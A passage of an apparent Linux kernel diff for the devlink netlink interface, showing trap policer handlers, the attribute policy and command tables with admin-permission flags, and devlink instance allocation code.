++	enum devlink_command cmd = DEVLINK_CMD_TRAP_POLICER_NEW;
++	struct devlink_trap_policer_item *policer_item;
++	u32 portid = NETLINK_CB(cb->skb).portid;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(policer_item, &devlink->trap_policer_list,
++				    list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_trap_policer_fill(msg, devlink,
++							   policer_item, cmd,
++							   portid,
++							   cb->nlh->nlmsg_seq,
++							   NLM_F_MULTI);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int
++devlink_trap_policer_set(struct devlink *devlink,
++			 struct devlink_trap_policer_item *policer_item,
++			 struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct nlattr **attrs = info->attrs;
++	u64 rate, burst;
++	int err;
++
++	rate = policer_item->rate;
++	burst = policer_item->burst;
++
++	if (attrs[DEVLINK_ATTR_TRAP_POLICER_RATE])
++		rate = nla_get_u64(attrs[DEVLINK_ATTR_TRAP_POLICER_RATE]);
++
++	if (attrs[DEVLINK_ATTR_TRAP_POLICER_BURST])
++		burst = nla_get_u64(attrs[DEVLINK_ATTR_TRAP_POLICER_BURST]);
++
++	if (rate < policer_item->policer->min_rate) {
++		NL_SET_ERR_MSG_MOD(extack, "Policer rate lower than limit");
++		return -EINVAL;
++	}
++
++	if (rate > policer_item->policer->max_rate) {
++		NL_SET_ERR_MSG_MOD(extack, "Policer rate higher than limit");
++		return -EINVAL;
++	}
++
++	if (burst < policer_item->policer->min_burst) {
++		NL_SET_ERR_MSG_MOD(extack, "Policer burst size lower than limit");
++		return -EINVAL;
++	}
++
++	if (burst > policer_item->policer->max_burst) {
++		NL_SET_ERR_MSG_MOD(extack, "Policer burst size higher than limit");
++		return -EINVAL;
++	}
++
++	err = devlink->ops->trap_policer_set(devlink, policer_item->policer,
++					     rate, burst, info->extack);
++	if (err)
++		return err;
++
++	policer_item->rate = rate;
++	policer_item->burst = burst;
++
++	return 0;
++}
++
++static int devlink_nl_cmd_trap_policer_set_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++
++	if (list_empty(&devlink->trap_policer_list))
++		return -EOPNOTSUPP;
++
++	if (!devlink->ops->trap_policer_set)
++		return -EOPNOTSUPP;
++
++	policer_item = devlink_trap_policer_item_get_from_info(devlink, info);
++	if (!policer_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
++		return -ENOENT;
++	}
++
++	return devlink_trap_policer_set(devlink, policer_item, info);
++}
++
++static const struct nla_policy devlink_nl_policy[DEVLINK_ATTR_MAX + 1] = {
++	[DEVLINK_ATTR_UNSPEC] = { .strict_start_type =
++		DEVLINK_ATTR_TRAP_POLICER_ID },
++	[DEVLINK_ATTR_BUS_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_DEV_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_PORT_INDEX] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_PORT_TYPE] = NLA_POLICY_RANGE(NLA_U16, DEVLINK_PORT_TYPE_AUTO,
++						    DEVLINK_PORT_TYPE_IB),
++	[DEVLINK_ATTR_PORT_SPLIT_COUNT] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_SB_INDEX] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_SB_POOL_INDEX] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_SB_POOL_TYPE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_SB_POOL_SIZE] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_SB_THRESHOLD] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_SB_TC_INDEX] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_ESWITCH_MODE] = NLA_POLICY_RANGE(NLA_U16, DEVLINK_ESWITCH_MODE_LEGACY,
++						       DEVLINK_ESWITCH_MODE_SWITCHDEV),
++	[DEVLINK_ATTR_ESWITCH_INLINE_MODE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_ESWITCH_ENCAP_MODE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_DPIPE_TABLE_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_RESOURCE_ID] = { .type = NLA_U64},
++	[DEVLINK_ATTR_RESOURCE_SIZE] = { .type = NLA_U64},
++	[DEVLINK_ATTR_PARAM_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_PARAM_TYPE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_PARAM_VALUE_CMODE] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_REGION_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_REGION_SNAPSHOT_ID] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_REGION_CHUNK_ADDR] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_REGION_CHUNK_LEN] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_HEALTH_REPORTER_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_FLASH_UPDATE_COMPONENT] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_FLASH_UPDATE_OVERWRITE_MASK] =
++		NLA_POLICY_BITFIELD32(DEVLINK_SUPPORTED_FLASH_OVERWRITE_SECTIONS),
++	[DEVLINK_ATTR_TRAP_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_TRAP_ACTION] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_TRAP_GROUP_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_NETNS_PID] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_NETNS_FD] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_NETNS_ID] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP] = { .type = NLA_U8 },
++	[DEVLINK_ATTR_TRAP_POLICER_ID] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_TRAP_POLICER_RATE] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_TRAP_POLICER_BURST] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_PORT_FUNCTION] = { .type = NLA_NESTED },
++	[DEVLINK_ATTR_RELOAD_ACTION] = NLA_POLICY_RANGE(NLA_U8, DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
++							DEVLINK_RELOAD_ACTION_MAX),
++	[DEVLINK_ATTR_RELOAD_LIMITS] = NLA_POLICY_BITFIELD32(DEVLINK_RELOAD_LIMITS_VALID_MASK),
++	[DEVLINK_ATTR_PORT_FLAVOUR] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_PORT_PCI_PF_NUMBER] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_PORT_PCI_SF_NUMBER] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_PORT_CONTROLLER_NUMBER] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_RATE_TYPE] = { .type = NLA_U16 },
++	[DEVLINK_ATTR_RATE_TX_SHARE] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_RATE_TX_MAX] = { .type = NLA_U64 },
++	[DEVLINK_ATTR_RATE_NODE_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_RATE_PARENT_NODE_NAME] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_LINECARD_INDEX] = { .type = NLA_U32 },
++	[DEVLINK_ATTR_LINECARD_TYPE] = { .type = NLA_NUL_STRING },
++	[DEVLINK_ATTR_SELFTESTS] = { .type = NLA_NESTED },
++};
++
++static const struct genl_small_ops devlink_nl_ops[] = {
++	{
++		.cmd = DEVLINK_CMD_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_get_doit,
++		.dumpit = devlink_nl_cmd_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_get_doit,
++		.dumpit = devlink_nl_cmd_port_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_RATE_GET,
++		.doit = devlink_nl_cmd_rate_get_doit,
++		.dumpit = devlink_nl_cmd_rate_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_RATE_SET,
++		.doit = devlink_nl_cmd_rate_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE,
++	},
++	{
++		.cmd = DEVLINK_CMD_RATE_NEW,
++		.doit = devlink_nl_cmd_rate_new_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_RATE_DEL,
++		.doit = devlink_nl_cmd_rate_del_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_RATE_NODE,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_SPLIT,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_split_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_UNSPLIT,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_unsplit_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_NEW,
++		.doit = devlink_nl_cmd_port_new_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_DEL,
++		.doit = devlink_nl_cmd_port_del_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_LINECARD_GET,
++		.doit = devlink_nl_cmd_linecard_get_doit,
++		.dumpit = devlink_nl_cmd_linecard_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_LINECARD,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_LINECARD_SET,
++		.doit = devlink_nl_cmd_linecard_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_LINECARD,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_get_doit,
++		.dumpit = devlink_nl_cmd_sb_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_POOL_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_pool_get_doit,
++		.dumpit = devlink_nl_cmd_sb_pool_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_POOL_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_pool_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_PORT_POOL_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_port_pool_get_doit,
++		.dumpit = devlink_nl_cmd_sb_port_pool_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_PORT_POOL_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_port_pool_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_TC_POOL_BIND_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_tc_pool_bind_get_doit,
++		.dumpit = devlink_nl_cmd_sb_tc_pool_bind_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_TC_POOL_BIND_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_tc_pool_bind_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_OCC_SNAPSHOT,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_occ_snapshot_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_SB_OCC_MAX_CLEAR,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_sb_occ_max_clear_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_ESWITCH_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_eswitch_get_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_ESWITCH_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_eswitch_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_DPIPE_TABLE_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_dpipe_table_get,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_DPIPE_ENTRIES_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_dpipe_entries_get,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_DPIPE_HEADERS_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_dpipe_headers_get,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_DPIPE_TABLE_COUNTERS_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_dpipe_table_counters_set,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_RESOURCE_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_resource_set,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_RESOURCE_DUMP,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_resource_dump,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_RELOAD,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_reload,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_PARAM_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_param_get_doit,
++		.dumpit = devlink_nl_cmd_param_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_PARAM_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_param_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_PARAM_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_param_get_doit,
++		.dumpit = devlink_nl_cmd_port_param_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_PORT_PARAM_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_port_param_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_REGION_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_region_get_doit,
++		.dumpit = devlink_nl_cmd_region_get_dumpit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_REGION_NEW,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_region_new,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_REGION_DEL,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_region_del,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_REGION_READ,
++		.validate = GENL_DONT_VALIDATE_STRICT |
++			    GENL_DONT_VALIDATE_DUMP_STRICT,
++		.dumpit = devlink_nl_cmd_region_read_dumpit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_INFO_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_info_get_doit,
++		.dumpit = devlink_nl_cmd_info_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_get_doit,
++		.dumpit = devlink_nl_cmd_health_reporter_get_dumpit,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_SET,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_set_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_RECOVER,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_recover_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_diagnose_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET,
++		.validate = GENL_DONT_VALIDATE_STRICT |
++			    GENL_DONT_VALIDATE_DUMP_STRICT,
++		.dumpit = devlink_nl_cmd_health_reporter_dump_get_dumpit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_DUMP_CLEAR,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_dump_clear_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_HEALTH_REPORTER_TEST,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_health_reporter_test_doit,
++		.flags = GENL_ADMIN_PERM,
++		.internal_flags = DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT,
++	},
++	{
++		.cmd = DEVLINK_CMD_FLASH_UPDATE,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = devlink_nl_cmd_flash_update,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_GET,
++		.doit = devlink_nl_cmd_trap_get_doit,
++		.dumpit = devlink_nl_cmd_trap_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_SET,
++		.doit = devlink_nl_cmd_trap_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_GROUP_GET,
++		.doit = devlink_nl_cmd_trap_group_get_doit,
++		.dumpit = devlink_nl_cmd_trap_group_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_GROUP_SET,
++		.doit = devlink_nl_cmd_trap_group_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_POLICER_GET,
++		.doit = devlink_nl_cmd_trap_policer_get_doit,
++		.dumpit = devlink_nl_cmd_trap_policer_get_dumpit,
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_TRAP_POLICER_SET,
++		.doit = devlink_nl_cmd_trap_policer_set_doit,
++		.flags = GENL_ADMIN_PERM,
++	},
++	{
++		.cmd = DEVLINK_CMD_SELFTESTS_GET,
++		.doit = devlink_nl_cmd_selftests_get_doit,
++		.dumpit = devlink_nl_cmd_selftests_get_dumpit
++		/* can be retrieved by unprivileged users */
++	},
++	{
++		.cmd = DEVLINK_CMD_SELFTESTS_RUN,
++		.doit = devlink_nl_cmd_selftests_run,
++		.flags = GENL_ADMIN_PERM,
++	},
++};
++
++static struct genl_family devlink_nl_family __ro_after_init = {
++	.name		= DEVLINK_GENL_NAME,
++	.version	= DEVLINK_GENL_VERSION,
++	.maxattr	= DEVLINK_ATTR_MAX,
++	.policy = devlink_nl_policy,
++	.netnsok	= true,
++	.parallel_ops	= true,
++	.pre_doit	= devlink_nl_pre_doit,
++	.post_doit	= devlink_nl_post_doit,
++	.module		= THIS_MODULE,
++	.small_ops	= devlink_nl_ops,
++	.n_small_ops	= ARRAY_SIZE(devlink_nl_ops),
++	.resv_start_op	= DEVLINK_CMD_SELFTESTS_RUN + 1,
++	.mcgrps		= devlink_nl_mcgrps,
++	.n_mcgrps	= ARRAY_SIZE(devlink_nl_mcgrps),
++};
++
++static bool devlink_reload_actions_valid(const struct devlink_ops *ops)
++{
++	const struct devlink_reload_combination *comb;
++	int i;
++
++	if (!devlink_reload_supported(ops)) {
++		if (WARN_ON(ops->reload_actions))
++			return false;
++		return true;
++	}
++
++	if (WARN_ON(!ops->reload_actions ||
++		    ops->reload_actions & BIT(DEVLINK_RELOAD_ACTION_UNSPEC) ||
++		    ops->reload_actions >= BIT(__DEVLINK_RELOAD_ACTION_MAX)))
++		return false;
++
++	if (WARN_ON(ops->reload_limits & BIT(DEVLINK_RELOAD_LIMIT_UNSPEC) ||
++		    ops->reload_limits >= BIT(__DEVLINK_RELOAD_LIMIT_MAX)))
++		return false;
++
++	for (i = 0; i < ARRAY_SIZE(devlink_reload_invalid_combinations); i++)  {
++		comb = &devlink_reload_invalid_combinations[i];
++		if (ops->reload_actions == BIT(comb->action) &&
++		    ops->reload_limits == BIT(comb->limit))
++			return false;
++	}
++	return true;
++}
++
++/**
++ *	devlink_set_features - Set devlink supported features
++ *
++ *	@devlink: devlink
++ *	@features: devlink support features
++ *
++ *	This interface allows us to set reload ops separatelly from
++ *	the devlink_alloc.
++ */
++void devlink_set_features(struct devlink *devlink, u64 features)
++{
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	WARN_ON(features & DEVLINK_F_RELOAD &&
++		!devlink_reload_supported(devlink->ops));
++	devlink->features = features;
++}
++EXPORT_SYMBOL_GPL(devlink_set_features);
++
++/**
++ *	devlink_alloc_ns - Allocate new devlink instance resources
++ *	in specific namespace
++ *
++ *	@ops: ops
++ *	@priv_size: size of user private data
++ *	@net: net namespace
++ *	@dev: parent device
++ *
++ *	Allocate new devlink instance resources, including devlink index
++ *	and name.
++ */
++struct devlink *devlink_alloc_ns(const struct devlink_ops *ops,
++				 size_t priv_size, struct net *net,
++				 struct device *dev)
++{
++	struct devlink *devlink;
++	static u32 last_id;
++	int ret;
++
++	WARN_ON(!ops || !dev);
++	if (!devlink_reload_actions_valid(ops))
++		return NULL;
++
++	devlink = kzalloc(sizeof(*devlink) + priv_size, GFP_KERNEL);
++	if (!devlink)
++		return NULL;
++
++	ret = xa_alloc_cyclic(&devlinks, &devlink->index, devlink, xa_limit_31b,
++			      &last_id, GFP_KERNEL);
++	if (ret < 0) {
++		kfree(devlink);
++		return NULL;
++	}
++
++	devlink->dev = dev;
++	devlink->ops = ops;
++	xa_init_flags(&devlink->snapshot_ids, XA_FLAGS_ALLOC);
++	write_pnet(&devlink->_net, net);
++	INIT_LIST_HEAD(&devlink->port_list);
++	INIT_LIST_HEAD(&devlink->rate_list);
++	INIT_LIST_HEAD(&devlink->linecard_list);
++	INIT_LIST_HEAD(&devlink->sb_list);
++	INIT_LIST_HEAD_RCU(&devlink->dpipe_table_list);
++	INIT_LIST_HEAD(&devlink->resource_list);
++	INIT_LIST_HEAD(&devlink->param_list);
++	INIT_LIST_HEAD(&devlink->region_list);
++	INIT_LIST_HEAD(&devlink->reporter_list);
++	INIT_LIST_HEAD(&devlink->trap_list);
++	INIT_LIST_HEAD(&devlink->trap_group_list);
++	INIT_LIST_HEAD(&devlink->trap_policer_list);
++	lockdep_register_key(&devlink->lock_key);
++	mutex_init(&devlink->lock);
++	lockdep_set_class(&devlink->lock, &devlink->lock_key);
++	mutex_init(&devlink->reporters_lock);
++	mutex_init(&devlink->linecards_lock);
++	refcount_set(&devlink->refcount, 1);
++	init_completion(&devlink->comp);
++
++	return devlink;
++}
++EXPORT_SYMBOL_GPL(devlink_alloc_ns);
++
++static void
++devlink_trap_policer_notify(struct devlink *devlink,
++			    const struct devlink_trap_policer_item *policer_item,
++			    enum devlink_command cmd);
++static void
++devlink_trap_group_notify(struct devlink *devlink,
++			  const struct devlink_trap_group_item *group_item,
++			  enum devlink_command cmd);
++static void devlink_trap_notify(struct devlink *devlink,
++				const struct devlink_trap_item *trap_item,
++				enum devlink_command cmd);
++
++static void devlink_notify_register(struct devlink *devlink)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct devlink_trap_group_item *group_item;
++	struct devlink_param_item *param_item;
++	struct devlink_trap_item *trap_item;
++	struct devlink_port *devlink_port;
++	struct devlink_linecard *linecard;
++	struct devlink_rate *rate_node;
++	struct devlink_region *region;
++
++	devlink_notify(devlink, DEVLINK_CMD_NEW);
++	list_for_each_entry(linecard, &devlink->linecard_list, list)
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++
